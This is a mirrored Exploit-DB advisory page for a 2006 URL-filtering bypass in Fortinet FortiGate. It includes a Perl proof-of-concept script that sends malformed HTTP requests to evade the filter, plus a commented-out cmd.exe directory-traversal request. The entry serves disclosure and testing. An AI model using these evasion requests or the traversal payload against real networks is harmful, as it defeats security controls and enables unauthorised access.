Lucene search

K

Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass

🗓️ 13 Feb 2006 00:00:00Reported by Mathieu DessusType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Fortinet Fortigate 2.x/3.0 URL Filtering Bypass vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
Fortinet-url.txt
14 Feb 200600:00
packetstorm
securityvulns
[Full-disclosure] URL filter bypass in Fortinet
13 Feb 200600:00
securityvulns
Cvelist
CVE-2005-3058
14 Feb 200619:00
cvelist
Cvelist
CVE-2008-7161
4 Sep 200910:00
cvelist
NVD
CVE-2005-3058
31 Dec 200505:00
nvd
NVD
CVE-2008-7161
4 Sep 200910:30
nvd
CVE
CVE-2005-3058
14 Feb 200619:00
cve
CVE
CVE-2008-7161
4 Sep 200910:30
cve
Prion
Hardcoded credentials
4 Sep 200910:30
prion
source: https://www.securityfocus.com/bid/16599/info

Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering.

FortiGate devices running FortiOS v2.8MR10 and v3beta are vulnerable to this issue. Other versions may also be affected.

# http_req.pl
#
# Made by (Mathieu Dessus)
#
# Make a filter for /test* URL in the Fortigate and
# remove the # depending on which HTTP request you want to test

use IO::Socket;

$target = '1.2.3.4';

# Detected
$data = "GET /test HTTP/1.1\r
Host: $target\r
Pragma: no-cache\r
Accept: */*\r
\r
";
# Not detected
$data = "GET /test2 HTTP/1.1
Host: $target
Pragma: no-cache
Accept: */*

";

# Not detected
$data = "GET /test3 HTTP/1.0\r\n\r\n";
# Detected
#$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n";
# Detected :)
#$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";


my $sock = new IO::Socket::INET (
                                  PeerAddr => $target,
                                  PeerPort => '80',
                                  Proto => 'tcp',
                                 );
die "Could not create socket: $!\n" unless $sock;
print $sock $data;
read($sock, $ret, 600);
print($ret."\n");
close($sock);

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
38
.json
Report